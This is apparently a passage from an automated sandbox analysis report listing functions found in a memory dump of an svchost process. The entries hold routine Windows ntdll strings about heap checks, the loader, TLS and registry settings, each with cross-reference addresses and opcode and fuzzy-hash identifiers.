                                                                                                                  • Instruction Fuzzy Hash: A5C187791083869FDB11DF19C044B6AB7F4BF8A704F04886AF8D6CB250E735CA59CB92
                                                                                                                  Function 03C40C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • HEAP: , xrefs: 03C954E0, 03C955A1
                                                                                                                  • HEAP[%wZ]: , xrefs: 03C954D1, 03C95592
                                                                                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 03C954ED
                                                                                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 03C955AE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                  • API String ID: 0-1657114761
                                                                                                                  • Opcode ID: 9f97ba4c01ddaee27a232c49c474d802d278c49840c44b229a6f1000e64a8be0
                                                                                                                  • Instruction ID: 076e8c470aff0b65029a658a9df4aa2a925a25cbc75631ca56e5e76a89266ff1
                                                                                                                  • Opcode Fuzzy Hash: 9f97ba4c01ddaee27a232c49c474d802d278c49840c44b229a6f1000e64a8be0
                                                                                                                  • Instruction Fuzzy Hash: 82A1FE74644265DFDB24DF29C840BBAFBB1BF45300F188569D59ACB282D330A948DB91
                                                                                                                  Function 03C6273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • .Local, xrefs: 03C628D8
                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 03CA22B6
                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 03CA21DE
                                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 03CA21D9, 03CA22B1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                  • API String ID: 0-1239276146
                                                                                                                  • Opcode ID: fdca7f42b31faa6d844bf742c36a1554693964e4387efbb8b78418a8bde02ee3
                                                                                                                  • Instruction ID: b2826c32c868836ce46a7b669e1b236e9d08e5134f462f307af6c926902610be
                                                                                                                  • Opcode Fuzzy Hash: fdca7f42b31faa6d844bf742c36a1554693964e4387efbb8b78418a8bde02ee3
                                                                                                                  • Instruction Fuzzy Hash: CDA1903590022A9FDB24CF65CC84BA9B3B5BF58314F1949E9D948EB251D730AE81CF90
                                                                                                                  Function 03C2F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                  • API String ID: 0-2586055223
                                                                                                                  • Opcode ID: e19f653f5be8967c6b5c435ce1777d866bddc06ab430b7b70bc4397821d8b153
                                                                                                                  • Instruction ID: fd342ce0c09ecdf1bb2acd97fd02a8919fecc3bbaa67bc0ff6dd3f769c0aebd0
                                                                                                                  • Opcode Fuzzy Hash: e19f653f5be8967c6b5c435ce1777d866bddc06ab430b7b70bc4397821d8b153
                                                                                                                  • Instruction Fuzzy Hash: D26103762047849FD721EB68C844F6BBBF8EF80714F090468E955CF291D734EA41DB61
                                                                                                                  Function 03CE11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                  • API String ID: 0-336120773
                                                                                                                  • Opcode ID: da149042040532db2c4f608fa831f5611827f26974554decd0587d9d43eb0193
                                                                                                                  • Instruction ID: 5f1bbe40d429d0cc9680e065787f1b3402d42bdfec66d537ad980fdef6b338d1
                                                                                                                  • Opcode Fuzzy Hash: da149042040532db2c4f608fa831f5611827f26974554decd0587d9d43eb0193
                                                                                                                  • Instruction Fuzzy Hash: F031DA76200260EFC751EB99CC86F6AB7E8EF09724F1D0055E411CF291E670FD50DA65
                                                                                                                  Function 03C29148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                  • API String ID: 0-1391187441
                                                                                                                  • Opcode ID: e5eafaf359f0ef30b90fca86fed854e3492ec99a49106e14773ab6919dce4c8e
                                                                                                                  • Instruction ID: 2b16a97c4704c4ec8cd1ff08bf83539b0091b0c20610ef4143cc539dffe71925
                                                                                                                  • Opcode Fuzzy Hash: e5eafaf359f0ef30b90fca86fed854e3492ec99a49106e14773ab6919dce4c8e
                                                                                                                  • Instruction Fuzzy Hash: A531C676600214EFCB11EB46CC85FDEBBB8EF45B24F154061E814EB291D770EE40DA60
                                                                                                                  Function 03C429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • HEAP: , xrefs: 03C43264
                                                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 03C4327D
                                                                                                                  • HEAP[%wZ]: , xrefs: 03C43255
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                  • API String ID: 0-617086771
                                                                                                                  • Opcode ID: 595365267faf5cf0bb4d914e068731d0807d0940b6241abadeed036220044dbc
                                                                                                                  • Instruction ID: ce0f1ab0c6a743a4b228ae14fa2d8f55a5782e90b59ec8fce17d7081e1ac042b
                                                                                                                  • Opcode Fuzzy Hash: 595365267faf5cf0bb4d914e068731d0807d0940b6241abadeed036220044dbc
                                                                                                                  • Instruction Fuzzy Hash: A692BD75A042899FDB25CF69C4447AEBBF1FF48300F188499E89AEB391D735AA41CF50
                                                                                                                  Function 03C41F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                  • API String ID: 0-3178619729
                                                                                                                  • Opcode ID: ec4b44d07af2cec73a7b097b9b71eb63ee3394c99a05417f393ca8f009a5e3ba
                                                                                                                  • Instruction ID: 38ce2c485ea0a510c28118b3f0696cfbf5c255415c51d3909ce1cf0304c43fe1
                                                                                                                  • Opcode Fuzzy Hash: ec4b44d07af2cec73a7b097b9b71eb63ee3394c99a05417f393ca8f009a5e3ba
                                                                                                                  • Instruction Fuzzy Hash: 3C2230706006419FEB16DF29C499B7AFBF5EF02704F1A849AE455CF282D736EA81CB50
                                                                                                                  Function 03C40770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                  • API String ID: 0-4253913091
                                                                                                                  • Opcode ID: 78a47837c847e0e564acb9056c43a6515cdfebdcf83bf62b57fe9de0461deabd
                                                                                                                  • Instruction ID: e100f5f71dd4729802482125215530a71f7aa6944b1c79e0738688a54b3ef17b
                                                                                                                  • Opcode Fuzzy Hash: 78a47837c847e0e564acb9056c43a6515cdfebdcf83bf62b57fe9de0461deabd
                                                                                                                  • Instruction Fuzzy Hash: 77F1A735A40605DFEB25CF69C988B6AF7B5FB45300F1981A9E506DF381D730EA81CB90
                                                                                                                  Function 03C31460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • HEAP: , xrefs: 03C31596
                                                                                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03C31728
                                                                                                                  • HEAP[%wZ]: , xrefs: 03C31712
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                  • API String ID: 0-3178619729
                                                                                                                  • Opcode ID: 679a9b0cbb8e2aa21bc64eac4cc0cb6b5daa010d046b2f16d485536717ac79c1
                                                                                                                  • Instruction ID: 81af117f9f9163f8b94f2f0bc3c279220a7ae9097e3c39daacc4b00415e27fc9
                                                                                                                  • Opcode Fuzzy Hash: 679a9b0cbb8e2aa21bc64eac4cc0cb6b5daa010d046b2f16d485536717ac79c1
                                                                                                                  • Instruction Fuzzy Hash: 13E10F70A046419FDB29EF69C451BBABBF5EF4A304F1C845DE496CB245E734EA40CB50
                                                                                                                  Function 03C3B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                  • API String ID: 0-1145731471
                                                                                                                  • Opcode ID: d5b35a7b40fb0bcd40e66d642715f178abfab4ffa2a12a26032e6a6574cec4f0
                                                                                                                  • Instruction ID: 67316c3576ad3af2c8fb938c07dc30a641932aea88614c1fb25d343e6ccda35e
                                                                                                                  • Opcode Fuzzy Hash: d5b35a7b40fb0bcd40e66d642715f178abfab4ffa2a12a26032e6a6574cec4f0
                                                                                                                  • Instruction Fuzzy Hash: FAB19C7AA047849BDF25CF69C884BADB7B6EF45314F1A446AE851EB380D730ED40CB54
                                                                                                                  Function 03CB368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                  • API String ID: 0-2391371766
                                                                                                                  • Opcode ID: cca0469bccdbac9f1ea6f3de2ce676d37f9af22542eb4f12ab82668b7ddbff29
                                                                                                                  • Instruction ID: 94041acdff6d14fe0c3d5a504aaac7474ecee571b9407ffc202430004e9228ae
                                                                                                                  • Opcode Fuzzy Hash: cca0469bccdbac9f1ea6f3de2ce676d37f9af22542eb4f12ab82668b7ddbff29
                                                                                                                  • Instruction Fuzzy Hash: 7CB1AF7A604381AFD321DE95C884FABB7F8EB54710F150929FA40EB290D775ED44CB92
                                                                                                                  Function 03C56962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $@
                                                                                                                  • API String ID: 0-1077428164
                                                                                                                  • Opcode ID: 31f0cab33a2a042c6c694c493e9d4bb25dd8d1c2e0738b59bcfc16bfede09a83
                                                                                                                  • Instruction ID: 9963b2846c285927d2aa408ff868429a502e28cf0ad00327ad05be377d3d1cce
                                                                                                                  • Opcode Fuzzy Hash: 31f0cab33a2a042c6c694c493e9d4bb25dd8d1c2e0738b59bcfc16bfede09a83
                                                                                                                  • Instruction Fuzzy Hash: 6AC280716083419FEB25CF25C884BABB7E5AF88744F09896EFD89CB240D734D984CB56
                                                                                                                  Function 03C2A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                  • API String ID: 0-2779062949
                                                                                                                  • Opcode ID: 4fd54bb9ed763a83541d46e30cebaf356249cce895ae621e7e4cb314a123e077
                                                                                                                  • Instruction ID: 437486ede257791e510f956bc82f24a55c1816bbb80050964aeae1dedba7d6db
                                                                                                                  • Opcode Fuzzy Hash: 4fd54bb9ed763a83541d46e30cebaf356249cce895ae621e7e4cb314a123e077
                                                                                                                  • Instruction Fuzzy Hash: B2A16A759012299BDB21EB24CC88BEAF7B8EB44714F0541E9E909EB250DB35AFC5CF50
                                                                                                                  Function 03CC36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                  • API String ID: 0-318774311
                                                                                                                  • Opcode ID: b8be4b79cb537342504e471993a9e6bba2f83bfbadff045e693f8a026e59a221
                                                                                                                  • Instruction ID: 788c2d5aeef06ecedecd1d9d23ffc038318d47e1cd5879889e2ec6fe5b14cce8
                                                                                                                  • Opcode Fuzzy Hash: b8be4b79cb537342504e471993a9e6bba2f83bfbadff045e693f8a026e59a221
                                                                                                                  • Instruction Fuzzy Hash: 608198796283C0AFE311DB15D944B6AB7E8FF85750F09892DF980DB390DB38D9048B62
                                                                                                                  Function 03C6909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: %$&$@
                                                                                                                  • API String ID: 0-1537733988
                                                                                                                  • Opcode ID: 504d6c76d6aabbbf342aa9bf2200867030a521dfbed55b829e4ada3a32cec2a5
                                                                                                                  • Instruction ID: 74a7dcb003fdeec920b2ab11c5ad6dd90826de3c09bfbc7d1be4758b298fea5f
                                                                                                                  • Opcode Fuzzy Hash: 504d6c76d6aabbbf342aa9bf2200867030a521dfbed55b829e4ada3a32cec2a5
                                                                                                                  • Instruction Fuzzy Hash: B171B1746087429FC714DF25C5C0A6BFBE9FF89618F24891DE49ACB251C731EA05CB92
                                                                                                                  Function 03D0B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • TargetNtPath, xrefs: 03D0B82F
                                                                                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 03D0B82A
                                                                                                                  • GlobalizationUserSettings, xrefs: 03D0B834
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                  • API String ID: 0-505981995
                                                                                                                  • Opcode ID: da5b7b499c26efec94aa2abb1684b415963fdfe8c3d64640c042de077b620766
                                                                                                                  • Instruction ID: 5e95eb2bdbfca965b4935152628dfb0b949ebdfd1cdde7e6dd6101aa6cb879cf
                                                                                                                  • Opcode Fuzzy Hash: da5b7b499c26efec94aa2abb1684b415963fdfe8c3d64640c042de077b620766
                                                                                                                  • Instruction Fuzzy Hash: 5F617076D45229ABDB21DF54DC88BDAB7B8EF54B10F0101E6A908EB290C774DE84CF90
                                                                                                                  Function 03C2F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • HEAP: , xrefs: 03C8E6B3
                                                                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 03C8E6C6
                                                                                                                  • HEAP[%wZ]: , xrefs: 03C8E6A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                  • API String ID: 0-1340214556
                                                                                                                  • Opcode ID: c91c2238d789c985d85c509e12a70a97de394e38dba37779c5b77e93e347eec9
                                                                                                                  • Instruction ID: 951c999233127f240e245bc3bd65afc6d00cdc77fe9c00f010a36a6227a3a770
                                                                                                                  • Opcode Fuzzy Hash: c91c2238d789c985d85c509e12a70a97de394e38dba37779c5b77e93e347eec9
                                                                                                                  • Instruction Fuzzy Hash: A751C336604798EFD712EB68C844BAAFBF8EF05704F0900A9E951CF692D774EA50DB50
                                                                                                                  Function 03CDDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • HEAP: , xrefs: 03CDDC1F
                                                                                                                  • HEAP[%wZ]: , xrefs: 03CDDC12
                                                                                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 03CDDC32
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                  • API String ID: 0-3815128232
                                                                                                                  • Opcode ID: 5f92ae74f08ae22dd5f3f9fbcc60e3fc3c3db8c055dfaab16816bfa767d60954
                                                                                                                  • Instruction ID: ca8eabd843401fdc74dafb188d45ee8cc12f48b773a8a72aafc308990ade9afd
                                                                                                                  • Opcode Fuzzy Hash: 5f92ae74f08ae22dd5f3f9fbcc60e3fc3c3db8c055dfaab16816bfa767d60954
                                                                                                                  • Instruction Fuzzy Hash: A0514435904250AEE374DE2AC88C772B7E1DF45248F09888AF6D3CF285DA75E942DB60
                                                                                                                  Function 03C6C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 03CA82DE
                                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 03CA82D7
                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 03CA82E8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                  • API String ID: 0-1783798831
                                                                                                                  • Opcode ID: c39ae1916284f272e8d67b83b42e3bc39cd1d390205d3df38f6a7e92448940b2
                                                                                                                  • Instruction ID: 78c61bcc662049bfcdbdeb0d9ef0a11cb146565d0ef5fd3c0b6a8e0dd7cee46e
                                                                                                                  • Opcode Fuzzy Hash: c39ae1916284f272e8d67b83b42e3bc39cd1d390205d3df38f6a7e92448940b2
                                                                                                                  • Instruction Fuzzy Hash: B94115B6500310ABC720FB28DC84B5BBBE8FF59750F05492AF988DB250E770E910DB91
                                                                                                                  Function 03C616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • LdrpAllocateTls, xrefs: 03CA1B40
                                                                                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03CA1B39
                                                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 03CA1B4A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                  • API String ID: 0-4274184382
                                                                                                                  • Opcode ID: fb29c41ec77d586e7c5ece2c834298da98c7f6e3f992240ec0c7fe47a360b6c1
                                                                                                                  • Instruction ID: 7ef97095a0fa9db8470720eaf7932cbb88825973fec6e60cd8ca4d272fc351e0
                                                                                                                  • Opcode Fuzzy Hash: fb29c41ec77d586e7c5ece2c834298da98c7f6e3f992240ec0c7fe47a360b6c1
                                                                                                                  • Instruction Fuzzy Hash: 8541AC79A00609AFCB15DFA9D881BAEFBF5FF59714F098119E405EB300D774A900DB90
                                                                                                                  Function 03CEC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • PreferredUILanguages, xrefs: 03CEC212
                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 03CEC1C5
                                                                                                                  • @, xrefs: 03CEC1F1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                  • API String ID: 0-2968386058
                                                                                                                  • Opcode ID: b7a326c172865d660a2d378da5f5985c667c51a4e5e5ba0af82421c2ea68c6f9
                                                                                                                  • Instruction ID: a0480f67736134208c97ac29797a3d7e9999c823cfa0305824c3019b0f3446a5
                                                                                                                  • Opcode Fuzzy Hash: b7a326c172865d660a2d378da5f5985c667c51a4e5e5ba0af82421c2ea68c6f9
                                                                                                                  • Instruction Fuzzy Hash: D0418D76E0020AEFDB11DAD4C885FEEB7B8AB14700F05806AE905FB290D774AA449B90
                                                                                                                  Function 03CC4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                  • API String ID: 0-1373925480
                                                                                                                  • Opcode ID: cbbaa152420b5dfcbaac0e7cc0c92ca32a6b2811f0cdaefc77cec4681095eb85
                                                                                                                  • Instruction ID: 6e10281a0cc84889dd7462a7e4249357277955806e16dccee929315d26c2113e
                                                                                                                  • Opcode Fuzzy Hash: cbbaa152420b5dfcbaac0e7cc0c92ca32a6b2811f0cdaefc77cec4681095eb85
                                                                                                                  • Instruction Fuzzy Hash: 694102759203C88BEB2ADBA6C860BADB7B8EF55340F19445ED841EF391D6359A01CB10
                                                                                                                  Function 03CB4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 03CB4899
                                                                                                                  • LdrpCheckRedirection, xrefs: 03CB488F
                                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03CB4888
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                  • API String ID: 0-3154609507
